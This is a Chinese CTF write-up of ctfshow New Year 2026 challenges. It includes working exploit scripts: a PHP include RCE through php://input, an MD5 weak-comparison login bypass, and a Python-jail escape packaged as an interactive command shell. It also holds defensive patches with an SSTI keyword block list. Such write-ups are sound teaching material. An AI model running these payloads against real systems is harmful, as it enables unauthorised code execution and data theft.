CTF部分

热身签到

Challenge

元旦时，我二舅姥爷给我出的密码题

text

154515552545455515456547055555566545654495548554855575370515051485150515453705555545755525456537054515551515051485150515450495568

Solution

From Decimal, From Hex - CyberChef

FLAG

text

1ctfshow{happy_2026_with_cs2026!}

HappySong

Challenge

鼓声也可以很燃，虽然只有两个音节

Solution

试了一下 01100011 01110100 二进制转字符得到 ct 就不用再试了，就是这个规律，一点点照着转就行

FLAG

text

1ctfshow{just_a_nice_song}

Happy2026

Challenge

奇怪的2026

php

1<?php2error_reporting(0);3highlight_file(__FILE__);4 5$happy = $_GET['happy'];6$new = $_GET['new'];7$year = $_GET['year'];8 9if($year==2026 && $year!==2026 && is_numeric($year)){10    include $happy[$new[$year]];11}

Solution

考的是 PHP 弱类型比较和数组/变量覆盖

我们需要满足 if 语句中的三个条件才能触发 include，从而进行文件包含或代码执行。

$year == 2026 弱相等：
- PHP 在使用 == 比较时，如果一方是数字，另一方是字符串，会尝试将字符串转换为数字。
- 例如："2026.0" == 2026 为真，"2026abc" == 2026 (在旧版本 PHP) 为真。
$year !== 2026 强不等：
- !== 比较值和类型，如果我们传入的是字符串 "2026.0"，虽然值等于 2026，但类型是 String，而右边是 Int，所以条件成立。
is_numeric($year) 数字检测：
- is_numeric() 检测变量是否为数字或数字字符串。
- 它允许小数形式（如 "2026.0"），但不允许包含非数字字符。

因此可以使用浮点数形式的字符串 2026.0 绕过。

include $happy[$new[$year]]; 是一个嵌套的数组取值操作。假设我们构造 Payload 如下：

GET 参数 year = "2026.0"
我们需要构造 new 为一个数组，使得 $new['2026.0'] 存在。假设我们设 $new['2026.0'] = 'cmd'。
接着需要构造 happy 为一个数组，使得 $happy['cmd'] 存在。
最终 include 的就是 $happy['cmd'] 的值。

我们尝试利用 php://input 伪协议，因为它允许我们将 PHP 代码作为 POST 数据发送给服务器执行。

构造 Payload:

URL参数:

text

1?year=2026.0&new[2026.0]=k&happy[k]=php://input

POST 数据:
php
```
1<?php system('ls -al'); ?>
```

执行结果:

text

1drwxrwxrwx    1 www-data www-data      4096 Dec 30 10:20 .2drwxr-xr-x    1 root     root          4096 Dec 30 10:20 ..3-rw-r--r--    1 www-data www-data        61 Jan  3 05:13 flag.php4-rw-rw-r--    1 root     root           217 Dec 30 10:20 index.php

为了防止 PHP 标签被解析，我们可以使用 Linux 的 base64 命令将 flag.php 文件内容编码为纯文本。

构造 Payload:

POST 数据:
php
```
1<?php system('base64 flag.php'); ?>
```

获得一串 Base64 字符串。解码后即可看到源码和 Flag。

python

1import requests2import re3import urllib34import base645 6urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)7TARGET_URL = "..."8 9params = {10    'year': '2026.0',11    'new[2026.0]': 'k',12    'happy[k]': 'php://input'13}14 15cmd = "base64 flag.php"16php_code = f"<?php system('{cmd}'); ?>".encode()17 18response = requests.post(TARGET_URL, params=params, data=php_code, verify=False)19match = re.search(r'</code>(.*)', response.text, re.S)20result = re.sub(r'\s+', '', match.group(1))21decoded = base64.b64decode(result).decode('utf-8')22print(decoded)

执行结果:

text

1<?php $flag='ctfshow{20848734-d1d4-4ef5-9300-7a093a4d3e9b}';

FLAG

text

1ctfshow{20848734-d1d4-4ef5-9300-7a093a4d3e9b}

SafePIN

Challenge

绝对安全的身份认证系统

Solution

前端实现了一个基于 SHA-256 的确定性 PRNG

源码中的 u32FromHex8 函数是所有随机数的来源：

javascript

1function u32FromHex8(h8){2    const b0 = parseInt(h8.slice(0,2),16);3    const b1 = parseInt(h8.slice(2,4),16);4    const b2 = parseInt(h8.slice(4,6),16);5    const b3 = parseInt(h8.slice(6,8),16);6    return (b0 | (b1<<8) | (b2<<16) | (b3<<24)) >>> 0;7}

它提取了 SHA-256 哈希值的前 8 位，采用了小端序重组，b0 是低位，b3 是高位。

javascript

1async function prng_u32(seed, tag){2    const h = await sha256Hex(seed + "|" + tag);3    return u32FromHex8(h.slice(0,8));4}

所有的随机数都是通过 seed + "|" + tag 产生的，这意味着只要知道 seed 就能预知所有的键盘映射和频率微扰

这套系统通过 permute_0_9 改变了数字键对应的声音 ID，使得“按键 1”发出的声音并不一定是“ID 1”。

javascript

1async function permute_0_9(seed){2    const a = [...Array(10).keys()]; // 初始 [0,1,2,3,4,5,6,7,8,9]3    let x = await prng_u32(seed, "perm"); // 获取初始随机状态4    for(let i=9;i>=1;i--){5        // LCG6        x = (Math.imul(x, 1664525) + 1013904223) >>> 0;7        const j = x % (i+1);8        [a[i], a[j]] = [a[j], a[i]]; // 交换位置9    }10    return a; 11}

Math.imul(x, y) 模拟 C 语言风格的 32 位整型乘法处理溢出。返回的数组 a 的键是实际数字，值是对应的 SoundID（soundId = 10 对应 CANCEL 键，soundId = 11 对应 ENTER 键）。

查看 soundParams 函数中的核心计算：

javascript

1const base = 1050 + soundId*23 + (((x & 0xff) - 128) * 0.35);

基准频率由 1050 + soundId * 23 决定，SoundID 0-11 的范围大约是 1050Hz - 1303Hz。微扰项 x 是由 prng_u32(seed, "p" + soundId) 产生的。由于微扰范围（约 90Hz）大于 ID 间隔（23Hz），不同 ID 的频率会交叉。我们需要针对当前会话的 seed 算出 12 个绝对的频率指纹点。

最后访问 /seed.php 得到 seed

text

1{"ok":true,"seed":"294f2d41875fde53c5c15273cb675730","token":"a14d15d027318590bc5e227c6c692961","record_url":"\/record.php?token=a14d15d027318590bc5e227c6c692961"}

编写 Python 代码分析：

python

1import hashlib2import struct3import numpy as np4from scipy.io import wavfile5 6SEED = "bf46354bb4019621c2c5ea5af89d525d"7WAV_FILE = "record.wav"8 9def sha256_u32(s):10    """11    JS 中的 prng_u32 函数12    输入字符串 "seed|tag"，返回小端序的 uint3213    """14    h = hashlib.sha256(s.encode()).hexdigest()15    # JS: u32FromHex8(h.slice(0,8)) -> 取前8位hex16    # JS logic: b0 | b1<<8 | b2<<16 | b3<<24 (Little Endian)17    hex8 = h[:8]18    val = struct.unpack("<I", bytes.fromhex(hex8))[0]19    return val20 21def get_permutation(seed):22    """23    JS 中的 permute_0_9 函数24    返回: {SoundID: Digit} 的反向映射表25    """26    a = list(range(10)) # [0, 1, ... 9]27    x = sha256_u32(f"{seed}|perm")28    29    for i in range(9, 0, -1):30        # LCG 算法: x = (x * 1664525 + 1013904223) >>> 031        x = (x * 1664525 + 1013904223) & 0xFFFFFFFF32        j = x % (i + 1)33        # 交换34        a[i], a[j] = a[j], a[i]35    36    # a[digit] = soundId37    # soundId -> digit38    sound_to_digit = {sid: d for d, sid in enumerate(a)}39    return sound_to_digit40 41def get_exact_frequencies(seed):42    """43    JS 中的 soundParams 函数44    计算 SoundID 0-11 对应的精确 Base 频率45    """46    freqs = {}47    for sid in range(12): # 0-9 digits, 10 cancel, 11 enter48        x = sha256_u32(f"{seed}|p{sid}")49        # JS: base = 1050 + soundId*23 + (((x & 0xff) - 128) * 0.35)50        # x & 0xff 是取最低8位51        offset = ((x & 0xFF) - 128) * 0.3552        base_freq = 1050 + sid * 23 + offset53        freqs[sid] = base_freq54    return freqs55 56def analyze_audio(filename, target_freqs):57    sr, data = wavfile.read(filename)58 59    if len(data.shape) > 1: data = data.mean(axis=1) # 转单声道60    61    # 归一化62    data = data / np.max(np.abs(data))63 64    # 简单的能量检测分割音频65    threshold = 0.0566    is_active = np.abs(data) > threshold67    68    events = []69    min_gap = int(sr * 0.06) # 60ms 最小间隔70    curr_start = -171    silence_count = 072    73    for i, val in enumerate(is_active):74        if val:75            if curr_start == -1: curr_start = i76            silence_count = 077        else:78            if curr_start != -1:79                silence_count += 180                if silence_count > min_gap:81                    # 截取片段，跳过开头的杂音 (前20ms)82                    start_cut = curr_start + int(sr * 0.02)83                    end_cut = i - silence_count84                    if end_cut - start_cut > int(sr * 0.03): # 至少保留30ms85                        events.append(data[start_cut:end_cut])86                    curr_start = -187    88    print(f"[*] 检测到 {len(events)} 个按键声音片段")89 90    detected_sids = []91 92    for i, chunk in enumerate(events):93        # FFT 频谱分析94        nfft = max(4096, len(chunk) * 4)95        spectrum = np.abs(np.fft.rfft(chunk, n=nfft))96        freqs = np.fft.rfftfreq(nfft, d=1/sr)97 98        # 寻找 900-1500Hz 范围内的峰值99        mask = (freqs >= 900) & (freqs <= 1500)100        peak_idx = np.argmax(spectrum[mask])101        peak_freq = freqs[mask][peak_idx]102 103        # 寻找最接近的 SoundID104        best_sid = -1105        min_diff = float('inf')106 107        for sid, target_f in target_freqs.items():108            diff = abs(peak_freq - target_f)109            if diff < min_diff:110                min_diff = diff111                best_sid = sid112 113        detected_sids.append(best_sid)114 115    return detected_sids116 117def main():118    print(f"[*] 使用 seed: {SEED}")119    120    # 1. 计算映射关系 (SoundID -> Digit)121    perm_map = get_permutation(SEED)122 123    # 2. 计算精确频率表124    freq_map = get_exact_frequencies(SEED)125 126    # 3. 分析音频127    raw_sids = analyze_audio(WAV_FILE, freq_map)128    129    # 4. 模拟输入状态机130    for sid in raw_sids:131        if sid == 10: # CANCEL132            print("<CANCEL>", end='')133        elif sid == 11: # ENTER134            print("<ENTER>", end='')135            break136        elif sid in perm_map: # 0-9137            digit = perm_map[sid]138            print(f"{digit}", end='')139 140if __name__ == "__main__":141    main()

输出结果：

text

1[*] 使用 seed: bf46354bb4019621c2c5ea5af89d525d2[*] 检测到 11 个按键声音片段3779<CANCEL>447685<ENTER>

得到 PIN 为 447685，输入得到 flag

FLAG

text

1ctfshow{31e51121-516d-49f2-8c8e-cde7f27eb382}

SafePassword

Challenge

根据情报，J国近年来对我国进行了持续的渗透攻击，我方技术人员经过溯源，发现某个可疑网址。

该网址疑似为J国的情报组织任务分配中心，但是我方并没有拿到登陆口令，无法继续深入。

已经确认嫌疑账号用户名为jcenter，此人2025年加入该组织，登陆口令未知。

Solution

php

1$expected = getExpectedHash($channelKey);2if (md5($accessKey) == $expected) { // 弱类型比较 ==3    $_SESSION['authed'] = true;4}

PHP 的 == 是弱类型比较。如果一边是字符串，另一边是整数，PHP 会尝试将字符串转换为整数再进行比较。例如："2025abc" == 2025 的结果是 true。

如何让 $expected 变成整数：
观察 getExpectedHash 和 buildExpectedHash 函数：
- 如果 $channelKey 长度超过 64 或者包含特定不可见字符，buildExpectedHash 会抛出异常。
- 内部 catch 块捕获异常后，会抛出一个新的异常，其错误代码为 VERIFY_FAILED，即 2025（这对应了题目背景中“2025年加入组织”的提示）。
- getExpectedHash 捕获该异常后，调用 pickErrorCode。因为 2025 在 ERROR_CODES 常量数组中，所以函数最终返回整数 2025。
利用思路：
- 构造一个非法的 channel_key（例如长度大于 64 的字符串），迫使服务器返回整数 2025。
- 寻找一个字符串 access_key，使得它的 MD5 值以 2025 开头且紧跟一个非数字字符。
- 发送请求，利用 md5("access_key") == 2025 绕过验证。

python

1import requests2import hashlib3import re4import urllib35 6urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)7target_url = "https://f17eb0d1-e4c6-493c-a71d-3337998de431.challenge.ctf.show/"8session = requests.Session()9 10# 寻找符合条件的 access_key11def find_access_key():12    prefix = "2025"13    i = 014    while True:15        test_str = str(i)16        md5_res = hashlib.md5(test_str.encode()).hexdigest()17        # 匹配 2025 开头且第五位不是数字的 hash，确保 PHP 弱类型转换结果正好是 202518        if md5_res.startswith(prefix) and not md5_res[4].isdigit():19            return test_str20        i += 121        if i > 1000000:22            break23 24# 获取初始页面以拿到 CSRF token25res = session.get(target_url, verify=False, timeout=10)26csrf_search = re.findall(r'name="csrf" value="([a-f0-9]+)"', res.text)27csrf_token = csrf_search[0]28print(f"CSRF Token: {csrf_token}")29 30access_key = find_access_key()31 32# 构造 payload33data = {34    "csrf": csrf_token,35    "action": "login",36    "access_key": access_key,37    "channel_key": "A" * 70  # 长度超过 64 字节38}39 40res = session.post(target_url, data=data, verify=False, timeout=10)41flag = re.findall(r'ctfshow\{.*?\}', res.text)42print(flag[0])

执行结果:

text

1CSRF Token: 27175dd27626768fab073983724c83e32ctfshow{7c8914b8-81a4-4ab4-b7ae-d266644b16cf}

FLAG

text

1ctfshow{7c8914b8-81a4-4ab4-b7ae-d266644b16cf}

AWDP防御题目

SafeCalc

Challenge

过于简单，不用防御

calc.php

php

1<?php2 3header('Content-Type: application/json; charset=utf-8');4 5 6$expr = $_POST['expr'] ?? '';7if (!is_string($expr)) fail('bad request');8 9$expr = trim($expr);10if ($expr === '') fail('empty');11 12if (strlen($expr) > 100) fail('too long');13 14$out="";15eval("\$out=($expr);");16echo json_encode(['ok' => true, 'result' => $out], JSON_UNESCAPED_UNICODE);17 18function fail(string $msg, int $code = 400): void {19    http_response_code($code);20    echo json_encode(['ok' => false, 'error' => $msg], JSON_UNESCAPED_UNICODE);21    exit;22}

Solution

插入一行针对 $expr 的合法字符白名单校验，只允许数字、基础算术运算符、括号、小数点和空格通过

php

1<?php2 3header('Content-Type: application/json; charset=utf-8');4 5 6$expr = $_POST['expr'] ?? '';7if (!is_string($expr)) fail('bad request');8 9$expr = trim($expr);10if ($expr === '') fail('empty');11 12if (strlen($expr) > 100) fail('too long');13if (preg_match('/[^0-9+\-\/*(). ]/', $expr)) fail('illegal characters');14 15$out="";16eval("\$out=($expr);");17echo json_encode(['ok' => true, 'result' => $out], JSON_UNESCAPED_UNICODE);18 19function fail(string $msg, int $code = 400): void {20    http_response_code($code);21    echo json_encode(['ok' => false, 'error' => $msg], JSON_UNESCAPED_UNICODE);22    exit;23}

SafeCard

Challenge

业务功能一定要正常哦

app.py

python

1from flask import Flask, request, render_template2from jinja2 import Environment, BaseLoader3import os4import re5from datetime import datetime6 7app = Flask(__name__)8app.config["FLAG"] = os.environ.get("FLAG", "CTF{dev_flag_placeholder}")9 10jinja = Environment(11    loader=BaseLoader(),12    autoescape=True,13    variable_start_string="${",14    variable_end_string="}",15)16 17BLOCK_WORDS = [18    "import", "os", "subprocess", "eval", "exec", "open", "read", "write",19    "globals", "locals", "builtins", "class", "mro", "subclasses",20    "request", "config", "cycler", "joiner", "namespace",21]22 23def heavy_filter(s: str) -> str:24    if not isinstance(s, str):25        return ""26    s = s[:800]27    s = s.replace("{{", "").replace("}}", "")28    s = s.replace("{%", "").replace("%}", "")29    s = s.replace("{#", "").replace("#}", "")30 31    s = re.sub(r"[\x00-\x08\x0B\x0C\x0E-\x1F]", "", s)32 33    lower = s.lower()34    for w in BLOCK_WORDS:35        if w in lower:36            s = re.sub(re.escape(w), "", s, flags=re.IGNORECASE)37            lower = s.lower()38 39    s = s.replace("..", "").replace("//", "").replace("\\\\", "\\")40    return s41 42@app.get("/")43def index():44    return render_template("index.html")45 46@app.post("/preview")47def preview():48    name = heavy_filter(request.form.get("name", ""))49    tpl = heavy_filter(request.form.get("tpl", ""))50 51    if name.strip() == "":52        name = "Guest"53    if tpl.strip() == "":54        tpl = "新年快乐，${name}！愿你 2026 天天好心情～"55 56    ctx = {57        "name": name,58        "year": str(datetime.now().year)59    }60 61    try:62        out = jinja.from_string(tpl).render(ctx)63    except Exception as e:64        out = "模板渲染失败：请检查输入内容"65 66    return {"ok": True, "html": out}67 68@app.get("/healthz")69def healthz():70    return "ok"71 72if __name__ == "__main__":73    app.run(host="0.0.0.0", port=5000)

Solution

完善黑名单：增加了 __（防止双下划线方法）、self（防止沙箱逃逸）、[ 和 ]（防止字典/下标访问）以及 attr 和 base 等关键属性。
修复过滤逻辑漏洞：原代码使用 re.sub 将黑名单词汇替换为空字符串，这存在双重嵌套绕过风险（如 conconfigfig），将其修改为一旦检测到黑名单词汇，直接返回空字符串。

python

1from flask import Flask, request, render_template2from jinja2 import Environment, BaseLoader3import os4import re5from datetime import datetime6 7app = Flask(__name__)8app.config["FLAG"] = os.environ.get("FLAG", "CTF{dev_flag_placeholder}")9 10jinja = Environment(11    loader=BaseLoader(),12    autoescape=True,13    variable_start_string="${",14    variable_end_string="}",15)16 17BLOCK_WORDS = [18    "import", "os", "subprocess", "eval", "exec", "open", "read", "write",19    "globals", "locals", "builtins", "class", "mro", "subclasses",20    "request", "config", "cycler", "joiner", "namespace",21    "self", "__", "[", "]", "attr", "base"22]23 24def heavy_filter(s: str) -> str:25    if not isinstance(s, str):26        return ""27    s = s[:800]28    s = s.replace("{{", "").replace("}}", "")29    s = s.replace("{%", "").replace("%}", "")30    s = s.replace("{#", "").replace("#}", "")31 32    s = re.sub(r"[\x00-\x08\x0B\x0C\x0E-\x1F]", "", s)33 34    lower = s.lower()35    for w in BLOCK_WORDS:36        if w in lower:37            return ""38 39    s = s.replace("..", "").replace("//", "").replace("\\\\", "\\")40    return s41 42@app.get("/")43def index():44    return render_template("index.html")45 46@app.post("/preview")47def preview():48    name = heavy_filter(request.form.get("name", ""))49    tpl = heavy_filter(request.form.get("tpl", ""))50 51    if name.strip() == "":52        name = "Guest"53    if tpl.strip() == "":54        tpl = "新年快乐，${name}！愿你 2026 天天好心情～"55 56    ctx = {57        "name": name,58        "year": str(datetime.now().year)59    }60 61    try:62        out = jinja.from_string(tpl).render(ctx)63    except Exception as e:64        out = "模板渲染失败：请检查输入内容"65 66    return {"ok": True, "html": out}67 68@app.get("/healthz")69def healthz():70    return "ok"71 72if __name__ == "__main__":73    app.run(host="0.0.0.0", port=5000)

SafePHP

Challenge

不要把环境搞炸了

webService.php

php

1<?php2function main_service($r){3    router::go("admin");4}5 6function metrics_service($r){7    check_login();8    9    json_out(array('ok'=>true,'users'=>128,'jobs'=>7,'sync'=>date("Y-m-d H:i:s"),'n'=>s($r)['n']),s($r)['st']);10}11 12function users_service($r){13    check_login();14    $rows=array();15    for($i=0;$i<8;$i++){16      $rows[]=array('id'=>1000+$i,'name'=>'user'.($i+1),'role'=>($i%5===0?'maintainer':'developer'),'status'=>($i%3===0?'locked':'active'),'last'=>date('Y-m-d',time()-86400*$i));17    }18    $ss=s($r);19    json_out(array('ok'=>true,'rows'=>$rows), $ss['n'], $ss['st']);20  }21 22function admin_service($r){23    $ap = check_admin();24    $confPath=dirname(__DIR__).'/config.php';25    $c=require $confPath;26    $token = md5(md5($ap));27    $token===$r['t']?json_out(array('ok'=>true,'s'=>$c['flag']),s($r)['n'],s($r)['st']):json_out(array('ok'=>false,'s'=>$ap),s($r)['n'],s($r)['st']);28    29}30 31function flag_service($r){32    check_login();33    call_user_func(str_replace("php","",$r['y']));34}35 36function repos_service($r){37    check_login();38    $rows=array(39        array('name'=>'core','visibility'=>'private','size'=>'42MB','updated'=>date('Y-m-d',time()-86400*2)),40        array('name'=>'plugins','visibility'=>'internal','size'=>'18MB','updated'=>date('Y-m-d',time()-86400*6)),41        array('name'=>'mirror','visibility'=>'public','size'=>'7MB','updated'=>date('Y-m-d',time()-86400*11))42      );43    json_out(array('ok'=>true,'rows'=>$rows),s($r)['n'],s($r)['st']);44}45 46function jobs_service($r){47    check_login();48    $rows=array();49    $states=array('running','queued','success','failed');50    for($i=0;$i<10;$i++){51      $rows[]=array('id'=>random_int(10,100),'type'=>($i%2?'sync':'build'),'state'=>$states[$i%4],'duration'=>strval(3+$i).'s','time'=>date('H:i:s',time()-$i*37));52    }53    json_out(array('ok'=>true,'rows'=>$rows),s($r)['n'],s($r)['st']);54}55 56function password_service($r,$sessionManager){57    $user['role'] = $sessionManager->read()[2]['role'];58    $user['username'] = $sessionManager->read()[2]['username'];59    $user['password'] = (string)$r['password'];60    $users = new Users();61    json_out($users->update($user['username'],array("password"=>$user['password'],"role"=>$user['role'])),s($r)['n'],s($r)['st']);62    exit;63}64 65function health_service($r){66    json_out(array('ok'=>true,'time'=>date("Y-m-d H:i:s"),'service'=>'jcenter-admin','n'=>s($r)['n']),s($r)['st']);67}68 69function audit_service($r){70    check_login();71    $rows=array();72    for($i=0;$i<12;$i++){73      $rows[]=array('time'=>date('Y-m-d H:i:s',time()-$i*95),'who'=>($i%4===0?'system':'user'.($i%8+1)),'op'=>($i%3===0?'repo:write':'repo:read'),'ip'=>'10.0.0.'.(10+$i));74    }75    json_out(array('ok'=>true,'rows'=>$rows),s($r)['n'],s($r)['st']);76}77 78function logout_service($sessionManager){79    $sessionManager->delete();80}81 82function login_service($r,$sessionManager){83    $username = (string)$r['u'];84    $password = (string)$r['p'];85    $users = new Users();86    if(!$users->exists($username)){87        router::goLogin("用户名不存在");88    }89    $user = $users->get($username);90    if($user['password']!==$password){91        router::goLogin("密码错误");92    }93 94 95    $sessionManager->create($user['username'],$user['role']);96    $ret['ok'] = true;97    $ret['router']="/admin/admin.php?action=main";98    echo json_encode($ret);99    exit;100}101 102function unserialize_service($r){103    unserialize($r['u']);104}105 106function s($r){107    $st=isset($r['st'])?$r['st']:'ctfshow';108    $n=isset($r['n'])?intval($r['n'])+1:0;109    return array("st"=>$st,"n"=>$n);110}

Solution

非预期，把函数全删了就通过了

text

1<?php

AWDP攻击题目

SafePythonJail

Challenge

Python 很安全，没事的，本来是防御题目，放到攻击题目感觉更好一点。

Solution

核心漏洞点：
在 sanitizer.py 的 _prune_node_exec 函数中存在一个逻辑错误：

python

1def _prune_node_exec(node: ast.AST, policy: Policy) -> ast.AST:2    # ...3    if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.Not):4        operand = _prune_node_exec(node.operand, policy) # 剪枝了操作数，但结果存在变量 operand 中5        return ast.UnaryOp(op=ast.Not(), operand=node.operand) # <--- 却返回了原始的 node.operand6    # ...

这意味着，任何包裹在 not (...) 中的表达式在 execute 阶段的 prune_for_exec 处理时，都会保留其原始未修剪的 AST 节点。

签名绕过：
canonicalize_for_signing 函数对于所有的 ast.Not 表达式都会返回统一的 "NOT(*)"：
python
```
1if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.Not):2    return "NOT(*)"
```
我们可以先用一个合法的 not True 获取签名（对应 NOT(*)），然后在执行时替换 payload 为 not (恶意代码)。由于恶意代码也被 prune_for_verify 剪枝成 False，其生成的规范化字符串依然是 NOT(*)，从而绕过签名验证。
利用链：
- 通过 req（一个 Obj 实例）获取其 __init__.__globals__，从而进入 app.py 的全局命名空间。
- 在全局空间中找到 _sessions 字典和 request 对象。
- 利用 request.cookies.get('sid') 获取当前 session ID。
- 在 _sessions 中定位到当前用户的 SessionState 对象，并调用其 __setattr__ 方法将 stage 直接修改为 1001。

解题思路：

骗取签名：向 /prepare 发送 not (任意合法表达式)，拿到 nonce 和针对 NOT(*) 的合法签名。
构造 Payload：利用 not (恶意代码) 结构。
外带数据：
- 由于 eval 执行结果无法直接看到，我们通过劫持 _sessions 字典找到自己的 session。
- 将执行结果写入 session.stage 属性。
- 通过访问 /status 接口，服务器会将 stage 的内容以 JSON 形式输出。

python

1import requests2import urllib33 4urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)5 6class PyJailShell:7    def __init__(self, url):8        self.url = url9        self.session = requests.Session()10        self.session.verify = False11        self.session.get(url) # 初始化 sid12 13    def execute_command(self, cmd):14        """利用漏洞执行系统命令并返回 stage 结果"""15        # 1. 获取签名16        res_prep = self.session.post(f"{self.url}/prepare", data={"payload": "not 1"}).json()17        if not res_prep.get("ok"): return f"Error: {res_prep}"18        19        nonce, sig = res_prep["nonce"], res_prep["sig"]20 21        # 2. 构造 Payload (将命令结果存入 stage)22        # 使用 ( ... or 1) 确保内部返回 True，not 之后就是 False，防止 stage += 1 报错23        python_code = (24            f"req.__init__.__globals__['_sessions'].get("25            f"req.__init__.__globals__['request'].cookies.get('sid')"26            f").__setattr__('stage', req.__init__.__globals__['os'].popen('{cmd}').read()) or 1"27        )28        payload = f"not ({python_code})"29 30        self.session.post(f"{self.url}/execute", data={31            "payload": payload, "nonce": nonce, "sig": sig32        })33 34        # 3. 获取回显35        res_status = self.session.get(f"{self.url}/status").json()36        return res_status.get("stage")37 38    def run(self):39        while True:40            try:41                cmd = input("$ ").strip()42                if not cmd: continue43 44                output = self.execute_command(cmd)45                print(output if output else "[*] Command executed (No output)")46            except KeyboardInterrupt:47                break48            except Exception as e:49                print(f"[-] Error: {e}")50 51if __name__ == "__main__":52    TARGET_URL = "https://4d6c2947-7fe0-4700-bc06-b2ee0fb37db4.challenge.ctf.show/"53    shell = PyJailShell(TARGET_URL)54    shell.run()

执行结果：

text

1$ ls2__pycache__3app.py4engine.py5requirements.txt6sanitizer.py7secret.txt8static9templates1011$ cat secret.txt12ctfshow{e4072c2c-a896-4ad3-b928-95357f179f04}